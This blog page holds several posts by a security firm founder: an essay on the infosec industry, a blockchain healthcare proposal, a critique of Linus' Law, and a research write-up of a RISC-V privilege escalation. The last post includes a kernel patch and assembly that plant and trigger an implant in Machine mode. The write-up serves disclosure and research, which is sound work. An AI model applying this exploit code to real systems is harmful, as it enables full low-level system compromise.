Monday, October 23, 2017

An Eulogy for Infosec

Sam's Funeral

Last night I watched one of the best episodes of television to ever grace the liquid crystal affixed to the center of my living room. The episode "Eulogy" from season two of Pamela Adlon and Louis C.K.'s "Better Things" absolutely floored me. If you aren't watching, I highly suggest the show. Season two is particularly exceptional, and not solely for "Eulogy". 

Warning: this blog post is basically a spoiler for the episode. 

In the episode, Pamela's character Sam Fox starts off by leading a class in acting. This scene is meant to highlight the fragility of acting as a profession due to the drudgery of wading through awful writing to simply taste the chance of performing a brilliantly written piece, while exemplifying the actor's duty to capture and reproduce human vulnerability almost seamlessly. The cool and breezy way Sam exposes her students' strengths as weaknesses is elegantly juxtaposed against her own assertiveness. 

In the following scene, the exceptional skills Sam has tuned over the years are almost tossed aside when the practical and logistical world of commercial acting imposes itself on her. Take after take, she's relegated as the side-lined wife to a man-child in a fast, red car. Her talent has little bearing on her value in this scene, and is a perfect parallel to many careers that require years of stringent training to perform what are essentially menial duties. 

The rest of the episode is a beautiful study of these first two scenes, through the eyes of Sam and her daughters. At home, Sam's daughters dismiss her career as uninteresting; something to submit a casual eye-roll toward. Interestingly, Sam breaks the rule she defined for her actor students in the first scene by being confident and assertive, challenging her daughters, demanding their respect for her hard work and success. The daughters dismiss her as childish and weak, driving her from the house. 



Skip to the final scene, Sam arrives back home to a surprise "funeral", where her daughters and friends are eulogizing Sam, in order to tell her - albeit pseudo-indirectly - how much they do love and respect her. Sam (Pamela?) completely breaks down in perhaps one of the most sincere, vulnerable scenes I've ever watched, as she fulfills the promise set forth in scene one. 

Phenomenally written by Louis and heartbreakingly acted by Pamela, the episode actually brought tears to my eyes, for so many personal reasons. However, it also struck me as fascinating because professionally we suffer the same fate in so many careers, but especially information security. Why? Because we've been killing our industry for years. 

The Death of an Industry

At 44con this past September, I described why Information Security as an industry is dying. Don't believe me? You're not paying attention. Hacking, as an art, is dying. Our industry has been screaming at engineers and developers for decades without any attentiveness what-so-ever. Yet, over the past ~5 years, they're finally starting to listen. This is primarily thanks to major corporations like Google, Apple, and Microsoft backing information security as a necessity. Google Project Zero, Microsoft BlueHat and their many other initiatives, the exceptional team at Apple Product Security, they all have pushed the limits of what can be accomplished in offense. The result? A far stronger baseline for defense than we've ever seen in the history of computing. 

Today, it's almost impossible for an average hacker to develop a zero-day exploit for any given target. In the late 90's and early aughts, zero-days for Bind, sendmail, and even SSH were floating from secret-hacker-cult to secret-hacker-cult without the commercial world being any wiser. The cost of developing and deploying such technology today is so high that only a handful of people can do it, when it can even be done. 



We're also finding flaws faster than ever before. I wouldn't presume this is because there are "more" experts in the industry than ever before. That's quite flawed logic. Rather, it's because the tools are more cost effective and more available than ever before. Skilled hackers are still in the 1% of our industry, but they have better equipment than ever thanks to open source software and improvements in high-level programming languages. 

Point being? They're finally listening. Companies are hiring hackers at record speed. They're building security teams. They're building Secure Software Development programs. They're absorbing us. 

The result? We are no longer unique. We are becoming integrated

Better Things

But the real question that the episode "Eulogy" brought to mind was, are we respected? For all the effort we put in to coerce companies to integrate security into their process, are we heard? Are our efforts changing anything for the better?

No. 

While we perceive the baseline of security to be significantly elevated (and it has elevated) it has also shifted. We are essentially Sisyphus, except every boulder we focus on pushing uphill leaves another boulder to fall. While smartphone security has improved, laptop endpoint security has declined. IoT security is practically non-existent. While cloud security is fairly resilient. 



The baseline elevates based on our voice. And our voice is psychotic. Our industry spends more energy confusing executives and endusers than it successfully solves problems. We plead for engineers to listen to us, yet refuse to engage in reasonable discourse on what is cost-effective and practical, focusing instead on what mysterious and ethereal subtle flaws may or may not exist in hardware Trusted Platform Modules. 

Let me clarify something for you. The world is like Sam Fox's daughters. They just don't give a fuck what you think. They love you when you care for them. They love you because you care for them. But they don't want to hear your whining fucking voices. They want you to fix things. And we're not fixing things. If anything, we're scattering the problem through our pettiness and flippant behavior. 

We need to spend less time spouting the infosec equivalent of Trump-isms over 140 character communication channels and more time making Better Things. Change happens when we stop posturing. When we stop trying to be cool. When we sit down, communicate our thoughts in a healthy manner, and listen to each other. Change happens in spite of ourselves. Change happens when we show the world what real problems are, instead of what our agenda dictates. 

So shut the fuck up. Put your phone down. And make something better.

And to quote Diedrich Bader's character in the episode, don't engage me if you don't want to know how I actually feel about your thoughts and behaviors. 

Your Friend,
Don A. Bailey
CEO / Founder
Lab Mouse Security

Friday, May 5, 2017

Open Source Healthcare

No Matter What Side You're On, Admit It: You're Sick

Earlier today I became quite frustrated with the state of our social discussion on insurance, ACA, AHCA, and politics in general. Every day we read more articles, tweets, and social media posts that describe why Trumpcare, a.k.a. AHCA, is awful. On the flip side of the coin, many supporters are praising AHCA for the decreases they will see in their upcoming bills. 

I'm not here to debate the essence of AHCA. I am here to tell you that American insurance, as a whole, is an opaque black box of controversial billing classifications, executive hierarchies, and political influence. Regardless of whether you are for AHCA or against it, we all lose in the end through the use of American insurance programs. Why? Insurance companies function as (surprise!) corporations! 

Their first priority is profit, not benefiting the American people. And frankly that's fine. It's okay for a corporation to serve the community and profit. That's precisely what capitalism is all about! It's about the choice to use a service that helps you at your own cost. The problem in the United States of America isn't that we have for-profit corporations selling us health services, it's that this is our only reasonable model to acquire health assistance. 

To reinforce this concept of for-profit on those that might presume companies are doing the best they can to help us, let's take a look at some financial records, shall we?

Anthem

Anthem's CEO, Joseph R. Swedish, was compensated well in 2016 with a total of 16,455,697 USD. The previous year was gang-busters for Joe as well, with a total of just over 13 million USD in total compensation. This is only up around 100k from his previous year as Anthem chair. You can read the report here on the SEC website

Cigna

The CEO of Cigna, David M. Cordani, pulled in a total compensation package worth over 15 million dollars in 2016. This is actually down from over 17 million USD in 2015. View the SEC filings here

Aetna

Mark T. Bertolini, CEO of Aetna, raked in an excellent compensation package in 2016 worth over 18.6 million USD. This is an increase of over 3.5 million over his 2015 compensation package. Read the SEC filings here

So Corporations Make Money, So What?

Yes, corporations are designed to make money. That's totally fine. I'm actually for this practice. I love capitalism and I love the U.S.A.! I even respect these men for climbing their respective ladders and joining the ranks of well-compensated executives that are working hard for their corporations. This is not a bad thing

What is a bad thing is the way America's policies force us to choose programs that funnel into corporate interests with no alternative. This has resulted in major social volatility across every political and socioeconomic group. People on every side are angry, scared, and exhausted by the non-stop in-fighting, vicious hyperbole, and unabashed profiteering. 

Americans need a new choice, and they need it now. Not in ~3 years when AHCA's flaws bankrupt families. Not in ~3 years when entire groups of persons afflicted with "pre-existing conditions" are forced to funnel their hard-earned cash into insurance company pockets rather than back into a diverse marketplace. If someone takes the initiative today it may actually be a viable alternative in 3 years when AHCA kicks in, if it passes the Senate. 

"So what the hell is your point, Don? Get on with it."

The Issues As I See Them

As I see it, major issues with modern health insurance are as follows. Granted, I am a novice at this and most of this is based on empirical observations, so part of this blog post is a call to action from those who are more in the know than me
  • We pay high premiums
  • We have no idea how this money is appropriated
  • Individuals that need assistance are denied for absurd, often political/religious/etc reasons
  • People without adequate health care will die without adequate assistance
  • People are already dying and already going bankrupt because of American healthcare
  • Insurance companies run on massively outdated and inefficient human and computing infrastructures
Now I'm no fool. I don't think we can save the world. All I know is we can solve a few of the above issues. 
  1. Our money doesn't have to fund high executive salaries
  2. Our money doesn't have to fund absurd, archaic, over-engineered supporting infrastructure
  3. Our money doesn't have to be funneled into a black box for which we have no oversight and no right to influence, despite paying for it to exist
Our money can help people.

Salaries

Now this requires a bit of imagination, but picture an American health care system that didn't require executive salaries. Now, we've learned in sections above that executive compensation can tier out around ~15 million per year. Let's guesstimate that for all the top 25 health insurance companies, an average compensation package for their CEO is around 10 million. We can extrapolate this from SEC filings for a few, then presume that the industry self-regulates and requires these companies to dole out similar packages to incentivize talented CEOs. Next, let's extrapolate an average non-CEO high-level executive compensation package at around 5 million per year. Let's then presume that each of these companies has 3 high paid executives at a compensation of 5 million per year. 

So, total that all up as: ((25 * 10,000,000) + (25 * 3 * 5,000,000)) = ~625,000,000

The total amount of money we could recoup from a lack of high executive compensation is literally over a half a billion dollars per year. And that's just a reasonable estimate. In capitalist societies, we are supposed to be offered the option to pay for services, or alternatives that better suit us. Why are we choosing to pay for someone else to amass a fortune when our friends and neighbors are choosing medicine over food? 

This number might not seem like a large amount when you juxtapose it against the various billions of dollars being strewn about in the news lately, but given the number of people using GoFundMe just to raise 10,000 USD for their family medical bills, this could at the least help ~62,500 families. That sounds like a good thing, right?

Supporting Infrastructure

The dollars we stuff monthly into the insurance infrastructure is further distributed into a massive network of workers that have absolutely nothing to do with the actual medical professions imperative to the healthcare industry. Instead, their sole purpose is to log data, inspect databases, set up IT infrastructure, review coding practices, evaluate billing forms, input billing data, convert billing data, and the list goes on and on and on...

While many of these jobs are important and do ensure that the insurance machine itself works, it is the engineering of this machine that has failed us. Instead of designing a sleek, streamlined machine that performs one specific task - and performs it well - we've designed a contorted monstrosity that requires inefficient and mundane roles to maintain its cracking and withering facade. Without these jobs, the insurance industry would implode from the weight of its own inefficiency. 

The larger problem is that these jobs are extremely hard to quantify. It isn't as easy to identify the numbers of these roles, the salary compensation for these roles, or how tightly integrated their roles even are with the company (or companies) they support. Because of this, we can't jump to conclusions about the total dollars allocated to this space. All we know for sure is that it's a vortex in which money simply disappears. While I would love to wildly speculate that this portion of the insurance industry is the likely cause of billions of dollars in misappropriation, it would be a misdeed to do so. All I can say for sure is that we are indeed wasting, at the least, millions of dollars per month on trivial tasks that could be done through modern automation. 

No Visibility

And that brings us to the last point: we have no visibility into how insurance companies are ran, how they invest our money, or how they allocate funds to end users. There is no ability for the public to identify patterns of misappropriation. There is no ability for the public to identify millions of dollars that are misspent, that could have saved lives. There is no ability for the public, who pays into these massive "public" funds, to vote or evaluate how the money should be distributed. 

This, in my opinion, is the most damning red flag of all. We the people are legally forced to funnel money into a system that literally decides whether we live or die, yet we have less visibility into the inner workings of this system than we have into the political decisions made on The Hill. That lack of transparency is a national disgrace, and one that must be rectified. We literally pay for this creature to exist, this Frankenmonster of life support, yet we are denied the schematics out of a lack of privilege. 


Yeah, Yeah... I Hate Blockchain, Too; But...

One way to solve the three problems described above is with technology. One technology comes to mind, the Blockchain. While I am not a fan of Bitcoin as a whole, Blockchain technology has several major benefits that I'll focus on here: transparency, security, and traceability. 

Security

First and foremost, the Blockchain was designed brilliantly, and is the most fascinating aspect of Bitcoin technology. Each transaction made in the Bitcoin (or any Blockchain based network) is securely written into the Blockchain ledger. While there are infrastructure security concerns with Bitcoin (and similar coin technologies), the Blockchain can indeed be used to guard against fraud, even at scale. 

In fact, IBM is heavily invested in using Blockchain technology for almost everything, from financial services, to asset tracking, and even IoT. We at Lab Mouse Security have integrated Blockchain technology into our IoT Security Platform, to be released later this month (though we have zero plans to use it for medical or medical insurance purposes). Blockchain technology is no longer a toy, it is becoming a mainstream technology that can be used to secure some of the most critical transactions in commerce. 

Traceability

The Bitcoin Blockchain was designed to ensure that every transaction made in the system can be traced. The exact time the transaction was made, which party was the source, which party was the destination, the cost of the transaction, all of this data is stored globally. Everyone has access to it. 

If health care providers used this technology for insurance purposes, we could easily see that a health care provider (say, a hospital) received a payment from N sources. We could even encode transaction details that identified the related case number associated with the transactions so analysis understood who benefited from the transaction. 

This means that the insurance company is no longer a black box that slices away at each penny as quietly as it can. Each slice is loudly documented in the ledger for everyone to see. It would be possible to have almost absolute governance over the behavior of not only insurance companies, but their relationships to providers, and their relationships to individuals

Transparency

This brings us to transparency. Every relationship and transaction becomes public in the global ledger. This would allow The People to identify fund misappropriation, and even point out special treatment. Organizations that attempt to funnel money to specific providers in a suspicious or unethical way would be uncovered. Companies that inefficiently or unethically appropriate funds would not be able to hide their actions from the public ledger. 

Introducing Careful

When put together, these features enable a completely different type of insurance company, one that no longer needs many of the technologies that are required to drive the antiquated behemoths we've grown to loathe. We can reduce corporate overhead by streamlining processes that are outdated, inefficient, and performed by workers who are unnecessary when technology replaces their repetitive or largely-unnecessary jobs. 

We can make better decisions when the data is transparent. If all information about how insurance companies behave is open, there is less misappropriation, favoritism, and inefficient spending. 

We can act faster when someone is in need. By making the financial network that supports end-users open and transparent, we can quickly evaluate where pools of money are idle, and whether that money can be redirected to someone who needs it immediately. We can also identify which parties are best suited for a particular transaction, giving the end-user more choice as to what insurance organization and what healthcare provider is involved in their actual care. 

We can reduce the absurd costs of doing business, such as high-priced executive pay in an industry where many lives are lost for the cost of these compensation packages. 

I'd like to introduce the concept of http://careful.is/. This is just an idea, but it is an idea that could save lives. Blockchain is just a technology. For Open Source Healthcare to work, it must be driven by intelligent, experienced individuals that are willing to offer their perspectives for free, for the purposes of creating a system (or even the concepts for a system) that will benefit all people. It should be driven by individuals who want to use technology to uplift and save lives, not profit on investment opportunities. 

Getting Realistic

When Linux started, it was simply a few lines of code, and an angry idea that users had a right to control their hardware for free. While Careful probably isn't the Linux of health care, with the right minds working together it can influence the next group of people that do want to be the Linux of healthcare. 

If you would like to get involved, please reach out to me through Lab Mouse's contact page. Help document what insurance companies do. How do they work? How do they waste funds? How can they be more efficient? How can healthcare be improved by transparent and free technologies? What does it cost to run and maintain such technologies? How would users pay into the system? How would they take money out? How would fraud be combated? How would administration of the ecosystem work without compensation packages? How could transparency be maintained at low cost? 

While these questions seem almost impossible when posed here, and in all honesty we may never get real answers (the insurance companies are monoliths for a reason) if we don't try, we'll never find a path to a realistic alternative. If anything, this data could be used to improve existing insurance company processes, reducing waste and improving allocation to end-users. A licensing model that disallows the use of recouped funds for compensation packages/etc could be drafted that allows the exchange of information without it being used against the will of Careful. 

Regardless, it would be exciting to disrupt the insurance world. Wouldn't it? :-)

Faithfully,
Don A. Bailey
Founder and CEO
Lab Mouse Security

Saturday, April 29, 2017

The RISC-V Files: On Princeton MCM and Linus' Law

Princeton and RISC-V MCM

In the past week, a research team from Princeton's school of engineering released details on flaws they uncovered in the RISC-V memory consistency model (MCM). This is exciting work from Professor Margaret Martonosi and her team, because it demonstrates the value of using automation to uncover design flaws in complex systems. 

This strategy may be similar to the techniques used by commercial tools, such as Tortuga Logic's silicon security analysis utilities. Regardless, advances in capability from both commercial and academic teams has exponentially improved the state of the art over recent years. As a result, these bugs are being uncovered faster, and earlier in the engineering (or ratification) process, than ever before. 


Codasip and Linus' Law

To comment on the Martonosi's findings, the Codasip team released a blog post describing their thoughts in the context of long-term RISC-V reliability and security. While I typically agree with the Codasip team, and have a large amount of respect for their engineering staff, I thought it imperative to comment on one aspect of their article: complex security landscapes are not made shallow when more eyes are focused on them. 

This concept, colloquially known as Linus' Law, posits that all flaws in complex (and open) systems are increasingly easy to observe, detect, and resolve as the number of users and engineers of that system increases. While this model does work for quality assurance (stability) purposes, it does not work well for subtleties that impact the security of complex systems. 

While there are many reasons why this mantra fails with respect to security models, I'll focus on one example for the purposes of this blog post: Linus' Law largely implies that bugs will reveal themselves.


Security is Not Stability

Linus' Law presumes one of two things will occur to diminish the total number of bugs in a complex system:
  1. Many engineers hunt for flaws in source code
  2. A subset of N users out of T total users will observe and report any given bug
While there are hundreds of engineers working on the Linux code base, they are often constrained within the technology they are focused on improving or implementing. Though these engineers can identify problems within their own ecosystem, they are largely focused on the source code of their implementation, not the resultant object code or machine code generated to run their source code, or the effects their code will have (and vice-versa) on multiple aspects of a running system. This level of visbility into a complex architecture is extremely challenging to acquire, and even more challenging to maintain. This is why, while many engineers submit patches to the Linux kernel, only a handful of engineers are authorized to actually approve code for inclusion into each branch of the kernel. Put simply, only a few individuals are capable of observing complex security flaws, and these individuals are largely bogged down by engineering tasks that do not include the overarching analysis of subtle behaviors in the context of security. 

Yet, this point describes bugs that can be found easily prior to inclusion into the release of a kernel version. But, what happens when a bug does get through these checks and balances and ends up in the wild? This is where the many users part of Linus' Law comes into play. Someone, somewhere, out in production, will observe anomalous behavior. Hopefully, this user (or users) will also report this issue to the kernel team, or their distribution maintainers. It's fine to presume this will occur, but this will likely only occur if the bug is actually triggered by the user. 

In the case of complex security flaws, they are almost never triggered in the wild on accident. Exploiting a complex security flaw usually only occurs with intent, not arbitrarily. If one piece of a complex set of bugs leading to a critical gap in system security is triggered accidentally, it may never be observed as a flaw impacting security unless a specific chain of flaws are triggered all at once, and in a particular order. This is highly improbable in the real world, and results in a lot of simple bugs either being ignored as irrelevant, or resolved in the context of stability and not flagged as security related, which affects who applies the patch and how quickly

This is why applications like Ubuntu's whoopsie are imperative, to ensure that even the simplest bugs are not ignored. But, it also requires the team reviewing whoopsie bug/crash reports to be capable of evaluating the risk of each flaw, then properly escalating the issue to someone with authority. So, there are still gaps even with this practice in place. 

Thus, as we can see, Linus' Law works well to ensure the stability of complex systems, but it is very inefficient at identifying and guarding users against security flaws. 


That Lonesome Road

The real resolution to complex security related issues is creating a team to perform a unified analysis of each technology used in a system, and the overarching interactions between the technologies that make up the whole system. Using this model, less long-term flaws can make their way into system releases, and the ones that do are more likely to be simple bugs that can be detected using the presumptions in Linus' Law. 

In addition, tools like Professor Martonosi's team's technology, and commercial tools like Tortuga Logic's silicon security utilities, can greatly assist an internal security team, streamlining their workload and reducing errors by optimizing their time. 

This path, however, requires a long-term commitment to security, and an understanding that security is not a separate discipline from engineering, but is an effect of engineering stable systems. This is because a stable system is one that enforces rigid constraints around how data is accessed, stored, and processed. Insecure systems create arbitrary paths around these constraints, reducing the integrity of a system. Thus, any system with reduced integrity cannot be considered a stable system

Though it comes at a cost, the positive effects of implementing a security program are long lasting for both manufacturers and consumers, ensuring greater stability and system integrity for not only end-users, but for the global Internet. 

For more information on architectural security analysis, please reach out to Lab Mouse Security. We specialize in architectural security for embedded systems, from wearable IoT, to Industrial IoT, and more! 

Don A. Bailey
Founder and CEO
Lab Mouse Security

Tuesday, April 18, 2017

The RISC-V Files: Supervisor -> Machine Privilege Escalation Exploit

The Demo

The following video demonstrates my original proof-of-concept exploit for the RISC-V privilege escalation logic flaw in the 1.9.1 version of the standard. The exploit lives in a patched Linux kernel, controlled through a simple userland application. The Linux kernel triggers the exploit and breaks out of Supervisor privilege in order to abuse the Machine level privilege. You may need to play the video in full-screen mode to view the console text. 


In the video, the userland application fakesyscall is used to control the exploit living in the Linux kernel. The first option passed to the app (and subsequently to the kernel) is 6. Option 6 simply tells the kernel to dump bytes of memory at a specific address in RAM. Option 8 then overwrites this same memory region with illegal opcodes. Option 6 is used again to verify that the opcodes have been overwritten. 

Finally, option 9 is used to tell the malicious kernel to trigger a call from its privilege layer (Supervisor) to Machine mode, which executes the overwritten instructions. This causes an unhandled exception in QEMU, which is displayed at the bottom of the screen at the end of the video ("unhandlable trap 2"). Trap 2 represents the illegal instruction trap, which is not supported in the Machine layer of this implementation (riscv64-system-qemu and riscv-pk). 

A Brief Introduction to RISC-V Privilege

The RISC-V privilege model was initially designed as an ecosystem that consists of four separate layers of privilege: User, Supervisor, Hypervisor, and Machine. The User privilege layer is, of course, the least privileged layer, where common applications are executed. Supervisor is the privilege layer where the operating system kernel (such as Linux, mach, or Amoeba) lives. The Hypervisor layer was intended to be the layer at which control subsystems for virtualization would live, but has been deprecated in more recent versions of the privilege specification. The Machine layer is the highest privileged layer in RISC-V, and has access to all resources in the system at all times. 


Full compromise of a system with a RISC-V core can't simply mean compromise of both the User and System privilege layers, which is the goal of most modern attacks. Rather, breaking out of the System layer into the Machine layer is required. This is because of the capability that the Machine layer will have in the future. 

The Hypervisor layer (H-Mode) is currently removed from the 1.10 privilege specification. The intent is that it may be re-added in a future revision of the privilege specification. Alternatively, it could be conglomerated with the Machine layer. Regardless, both layers are designed to control processor functionality that the Supervisor layer cannot access. This includes physical memory regions assigned to other hypervisor guests, restricted peripherals, Hypervisor and Machine registers, and other high-privileged objects. 

In the future, Machine mode may also be used as a subsystem similar to TrustZone or Intel SMM. Trusted keys may be used here to validate executable code running in the Hypervisor or Supervisor layer. It may also support Supervisor's verification of User layer applications. Other critical security goals can be achieved by leveraging the isolation and omnipotence of the Machine layer. Such functionality may be able to detect and disable a Supervisor layer exploit. Thus, escalating privileges from Supervisor layer to Machine layer as quickly as possible is imperative for future-proofing RISC-V exploits.

Resolving the Risk

Before we get into the technical details, it is important to note that the RISC-V team is aware of this privilege escalation problem. I presumed this when I discovered this vulnerability, as anyone with a background in operating system theory or CPU memory models will quickly observe the gap in security caused by the 1.9.1 privilege specification's memory definition. More on that later. 



Regardless, I was unable to find material supporting that the team knew of this security gap and, in my excitement, did not realize that a resolution to this issue was proposed 15 days prior to my HITB talk. Stefan O'Rear emailed me privately and pointed out the git commit for the proposal, which explained why I was unable to find it (I was using poor search terms in my haste). 

The proposal (for PMP: Physical Memory Protection) can be found here on github. In his email to me, Stefan points out that the image QEMU (and Bellard's riscvemu) executes, which contains the bootloader and the embedded Linux kernel/rootfs images, isn't designed for full Machine layer protection, and that it may not be updated with the PMP model in the near future. 

This is a reasonable perspective, but, academically, the exploit is still an important demonstration of flaws in CPU security logic. The target, itself, doesn't have to be an attempt at a perfectly secure system. It is more important that the exploit be proven practical and useful as an exercise. 

Besides, this was the first CPU level security implementation flaw I've ever discovered on my own accord. So, I had extra incentive to actually exploit it. ;-)

But PMP Existed!

Correct! For those familiar, there was a PMP definition in the v1.9.1 privilege specification of RISC-V. However, this implementation was considered incomplete and not capable of deployment. This is probably why the qemu-system-riscv* emulators don't support it currently. As the git commit declares, the PMP full proposal scheme was only introduced a couple weeks prior to this post. 

The Vulnerability

The technical vulnerability is actually quite simple, especially if the reader is familiar with common CPU models for memory protection. Each privilege layer is presumed to be isolated from all lower privileged layers during code execution, as one would expect. The CPU itself ensures that registers attributed to a specific privilege layer cannot be accessed from a less privileged layer. Thus, as a policy, Supervisor layer code can never access Machine layer registers. This segmentation helps guarantee that the state of each layer cannot be altered by lower privileged layers. 

However, the original privilege specification defined memory protection in two separate places. First, the mstatus register's VM field defines what memory protection model shall be used during code execution. This can be found in section 3.1.8 of privilege specification v1.9.1. Table 3.3 in that same section outlines the various memory protection/translation schemes currently defined by the RISC-V team. 

The second place where memory protection is defined isn't in the Machine layer at all, it's in the Supervisor layer. This is where things get tricky. Because the Supervisor layer is where a traditional Operating System kernel would execute, it must be able to alter page tables to support dynamic execution of kernel code and userland applications. Thus, the sptbr (Supervisor Page-Table Base Register), found in section 4.1.10, allows the Supervisor layer to control read and write access to the page tables. 


For those that are unfamiliar, page tables control translation of virtual memory addresses (va) to physical memory addresses (pa). Page tables also enforce access privileges for each page, e.g. whether the page is Read-Only, Write-Only, Executable, etc. 

Because the Machine layer of privilege's executable code resides in physical memory, and the Supervisor layer can create page tables that can access that physical memory, the Machine layer cannot protect itself from the Supervisor layer. 

The attack works this way:
  • A malicious Supervisor kernel determines the physical address of Machine layer code
  • The kernel creates a page table entry that grants itself read/write access to the Machine layer
  • The kernel overwrites Machine layer code with a beneficial implant
  • The kernel triggers a trap to Machine mode, causing the implant to be executed with Machine privileges
It's quite simple! 

The Exploit

The fun part about this vulnerability was not so much discovering it, but writing a useful exploit rather than simply a proof-of-concept that demonstrated code execution. At HITB2017AMS this past week, I used a simple PoC to show that implanted code was indeed executing in Machine mode. However, this is quite boring and has no real value beyond proving the vulnerability. 

A real exploit needs to allow code injection in a way that any arbitrary payload can be implanted and executed within the Machine context, from Supervisor context. To accomplish this, it was necessary to do the following:
  • Identify Machine layer code that the Supervisor can trigger at will
  • Identify an unused or little-used function in that code that can be altered without negative consequence
  • Ensure arbitrary payloads can be stored within this region  


Triggering Machine Layer Code

This is the simplest part of the process. Currently, booting a RISC-V system means using the Proxy Kernel (riscv-pk) as a bootloader. This code lives in the Machine layer and loads an embedded kernel (such as Linux or FreeBSD) into virtual memory. 

The riscv-pk must support the embedded kernel by providing resources, such as access to the console device, information about the RISC-V CPU core the kernel is running on, and other duties usually handled by mask ROM or flash. riscv-pk does this through the ecall instruction, the common instruction used to call the next most privileged layer in the processor. For example, an ecall executed at the User layer will likely be handled at the Supervisor layer. An ecall executed at the Supervisor layer will be handled by the Machine layer. (This is a simplistic explanation that can get more complex with trap redirection, but we won't dive into those waters at this moment). 

So, when the Supervisor (Linux kernel) executes ecall, the Machine layer's trap handler is executed in Machine mode. The code can be found in the riscv-pk at trap 9, the mcall_trap function, in machine/mtrap.c

Unused Functionality

Most of the functionality in mcall_trap must be preserved, to ensure the stability of the system. Overwriting arbitrary instructions here is frowned upon from an exploit developer perspective. Instead, we must target specific functionality to disturb as little of the ecosystem as possible. Fortunately, we can do so with the MCALL_SHUTDOWN feature. 

This feature does precisely what it sounds like, it performs an immediate system shut down as if someone hit an ACPI power-off button on a PC. Presumably, we would never do this in a system we've compromised. We want the system live so we can control it! Thus, this is the feature to overwrite. However, only a few instructions can be overwritten here as the functionality is small. Take a look at the assembly generated by this feature:

    80000dfc:   00008417                auipc   s0,0x8
    80000e00:   20440413                addi    s0,s0,516 # 80009000 <tohost>
    80000e04:   00100793                li      a5,1
    80000e08:   00f43023                sd      a5,0(s0)
    80000e0c:   00f43023                sd      a5,0(s0)
    80000e10:   ff9ff06f                j       80000e08 <mcall_trap+0x18c>

This only gives us 6 instructions to overwrite. Not much capability can be performed here! So, instead, we simply call another region of memory that can't be directly accessed by forcing a trap to mcall_trap

We can be a bit clever and overwrite the code that bootstraps the Proxy Kernel, do_reset. This function has zero value for an already running environment! So, why not reclaim the executable space? When reading the objdump of the current riscv-pk, we can see that 60 32bit instructions (or 120 16bit compressed instructions) can be stored here. If we simply jump to the do_reset address and perform our real work here, we can get away with quite a bit, especially if we can constantly update this region of memory with any payload we choose. 

Arbitrary Payloads 

Storing arbitrary payloads in this region simply means designing a sufficiently engineered implant stager in our patched malicious Linux (or other) kernel. This feature simply loads the physical memory addresses at which an implant should live, and installs the implant. Easy! There's not much to it. The only catch is ensuring our jump instructions know the address of the target physical memory address (and can reach the address using a single instruction). 

Linux Kernel Patch

The change to the Linux kernel is simple. We simply alter a system call to perform the implant installation and mtrap trigger. This can be done by augmenting any system call with two chunks of code:


                /* install implant at physical address a2 */
                else if(regs->a1 == 8)
                {       
                        uint8_t * c;
                        int i;
                        
                        /* Overwrite an address a2 of maximum size 4096 with
                         * binary code pointed to by a4 of size a3.
                         */
                        printk( 
                                "DONB: overwriting %p:%lx\n",
                                (const void * )regs->a2,
                                regs->a3);
                        
                        x = ioremap(regs->a2, 4096);
                        printk("DONB: remapped to %p\n", x);
                        
                        r = -1;
                        if(!access_ok(VERIFY_READ, regs->a4, regs->a3))
                        {       
                                printk("DONB: bad access_ok\n");
                                goto __bad_copy;
                        }
                        
                        printk("DONB: access ok\n");
                        if(regs->a3 <= 0 || regs->a3 > 4096)
                        {       
                                printk("DONB: bad a3\n");
                                goto __bad_copy;
                        }
                        
                        printk("DONB: a3 ok\n");
                        
                        if(__copy_from_user(
                                x,
                                (const void * )regs->a4,      
                                regs->a3))
                        {
                                printk("DONB: bad copy from user\n");
                                goto __bad_copy;
                        }

                        printk("DONB: copy ok\n");

                        iounmap(x);

                        /* update the tlb */
                        __asm__("fence; fence.i");

The above code installs an implant at the given physical address in system call argument 2. Argument 4 contains a pointer to a userland buffer containing the binary to be written at the mapped virtual address. Argument 3 contains the size of the binary blob to be written. The last function ensures that the TLB is updated since we are altering instruction code, which guarantees that the CPU has the updated copy of our executable code and wont execute an out of date cache, once triggered.

                /* trigger implant overwritten at MCALL_SHUTDOWN */
                else if(regs->a1 == 9)
                {       
                        printk("DONB(8): ok, now try the m-hook\n");
                        
                        /* MCALL_SHUTDOWN=6 */
                        __asm__("li a7, 6; ecall; mv %0, a0" : "=r" (r));
                        
                        printk("DONB(8): returned = %d\n", r);
                
                }

This code issues an ecall, causing mcall_trap to be executed from Machine mode context. This, in other words, executes our implant at a higher privilege level.

.global callreset
callreset:
        auipc t0, 0
        addi t0, t0, -1578
        addi t0, t0, -1578
        jalr t0

Finally, the above code, written to the MCALL_SHUTDOWN feature in the mcall_trap function, calls our implant at do_reset. The code in my version of riscv-pk expects do_reset at address 0x800001a8 and the overwritten MCALL_SHUTDOWN code at 0x80000dfc. The differential between these two addresses requires two addi instructions to generate the proper negative offset. This can probably be done in a cleaner manner. 

The only requirement left is for the implant at do_reset to restore the stack and return, to avoid crashing by not properly adjusting the Machine mode memory layout. This can be accomplished by returning to the mcall_trap function at an address where it is performing this functionality. In my implementation, there is only one address where this occurs, 0x80000ccc. 


Gimme Code

For working demonstration code, please visit my github archive where I will track all of my RISC-V related security research. 

More to come!

Best,

Don A. Bailey
Founder/CEO
Lab Mouse Security
Mastodon: @donb@mastodon.social